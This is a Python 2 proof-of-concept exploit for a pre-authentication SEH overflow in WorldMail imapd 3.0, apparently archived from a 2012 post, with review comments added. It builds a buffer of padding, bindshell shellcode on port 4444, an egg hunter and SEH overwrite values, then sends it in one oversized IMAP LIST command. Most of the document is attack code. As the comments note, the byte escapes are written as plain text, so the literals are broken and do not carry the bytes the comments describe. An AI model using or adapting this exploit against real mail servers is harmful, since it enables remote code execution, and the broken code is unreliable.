WorldMail imapd 3.0 SEH Overflow
Posted on 13 January 2012
#!/usr/bin/python
## Proof-of-concept script as archived from a 2012 exploit post.  Read
## straight through, it does four things: parses host/port from argv,
## builds one string ("buffer"), opens a single TCP connection, and sends
## one IMAP command -- `a001 LIST <buffer>` -- after reading whatever the
## server sends first.  No LOGIN is issued, so the request is pre-auth.
## Python 2 syntax (print statement, quit()).
##
## NOTE(review): in this copy every byte escape in the string literals is
## written as plain text (e.g. "x90" rather than an escape sequence), so the
## literals as they appear here evaluate to ordinary ASCII and do not carry
## the byte values the author's trailing comments refer to.  Lengths and
## offsets documented below are therefore the author's intent, not what this
## text would produce.
##
## Defender context: the only network behaviour is one unauthenticated IMAP
## LIST command with an argument of several hundred bytes sent immediately
## after the greeting; that shape (oversized argument, no authentication) is
## what a log review or IDS signature for this product would key on.
import sys
import socket

## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
## Tested on: XP SP3 en-us
## Author: TheXero
## Website: www.thexero.co.uk
## http://www.nullsecurity.net

## Check for parameters
## Exactly two positional arguments are required (host, port); anything
## else prints the usage line and exits through quit().
if len(sys.argv) != 3:
    print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
    quit()

## Assigns the parameters
target = sys.argv[1]
port = int(sys.argv[2])  ## int() raises ValueError on a non-numeric port

## Sets up the socket
## Plain blocking TCP socket; no timeout is set, and there is no try/finally,
## so a failed connect() or send() leaves the socket to be closed by the
## interpreter on exit.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

## Sets the variables
## The final string is assembled at the bottom as
##     char + junk + shellcode + nseh + seh + hunter + char
## "char" brackets the payload on both ends; "nseh"/"seh" are the four-byte
## values the author places at the handler slots (see the POP ECX note on
## "seh"); "hunter" and the "T00WT00W" prefix go with the author's
## "Egg Hunter" label below.
char = "}"
nseh = "xebx06x90x90"
seh = "x4ex3bx01x10" ## 10013B4E |. 59 POP ECX mailcmn.dll
## This first assignment to "buffer" is dead: it is overwritten by the
## full assembly below before anything reads it.
buffer = 'x90' * 8
shellcode = ("T00WT00W" ## Bindshell port 4444
"xbdxe8x39x05xa5xdbxdbxd9x74x24xf4x58x29xc9xb1"
"x56x31x68x13x03x68x13x83xc0xecxdbxf0x59x04x92"
"xfbxa1xd4xc5x72x44xe5xd7xe1x0cx57xe8x62x40x5b"
"x83x27x71xe8xe1xefx76x59x4fxd6xb9x5ax61xd6x16"
"x98xe3xaax64xccxc3x93xa6x01x05xd3xdbxe9x57x8c"
"x90x5bx48xb9xe5x67x69x6dx62xd7x11x08xb5xa3xab"
"x13xe6x1bxa7x5cx1ex10xefx7cx1fxf5xf3x41x56x72"
"xc7x32x69x52x19xbax5bx9axf6x85x53x17x06xc1x54"
"xc7x7dx39xa7x7ax86xfaxd5xa0x03x1fx7dx23xb3xfb"
"x7fxe0x22x8fx8cx4dx20xd7x90x50xe5x63xacxd9x08"
"xa4x24x99x2ex60x6cx7ax4ex31xc8x2dx6fx21xb4x92"
"xd5x29x57xc7x6cx70x30x24x43x8bxc0x22xd4xf8xf2"
"xedx4ex97xbex66x49x60xc0x5dx2dxfex3fx5dx4exd6"
"xfbx09x1ex40x2dx31xf5x90xd2xe4x5axc1x7cx56x1b"
"xb1x3cx06xf3xdbxb2x79xe3xe3x18x0cx23x2ax78x5d"
"xc4x4fx7ex70x48xd9x98x18x60x8fx33xb4x42xf4x8b"
"x23xbcxdexa7xfcx2ax56xaex3ax54x67xe4x69xf9xcf"
"x6fxf9x11xd4x8exfex3fx7cxd8xc7xa8xf6xb4x8ax49"
"x06x9dx7cxe9x95x7ax7cx64x86xd4x2bx21x78x2dxb9"
"xdfx23x87xdfx1dxb5xe0x5bxfax06xeex62x8fx33xd4"
"x74x49xbbx50x20x05xeax0ex9exe3x44xe1x48xbax3b"
"xabx1cx3bx70x6cx5ax44x5dx1ax82xf5x08x5bxbdx3a"
"xddx6bxc6x26x7dx93x1dxe3x8dxdex3fx42x06x87xaa"
"xd6x4bx38x01x14x72xbbxa3xe5x81xa3xc6xe0xcex63"
"x3bx99x5fx06x3bx0ex5fx03")

## Calculates the size of junk depending on the shellcode
## The author pads so that junk + shellcode is 769 characters in total;
## if len(shellcode) ever exceeded 769 the multiplier would be negative and
## "junk" would silently become the empty string.
junk = "x41" * (769 - len(shellcode))

## Egg Hunter
hunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05"
"x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7")

## Assembles the buffer
buffer = char + junk + shellcode + nseh + seh + hunter + char

## Connects
s.connect((target,port))
## Reads up to 1024 bytes of the server greeting before sending; the value
## is never inspected.
data=s.recv(1024)
## socket.send() may transmit fewer bytes than requested; the return value is
## not checked here (sendall() would be the loop-until-done form).
s.send("a001 LIST " + buffer + " ")
s.close()
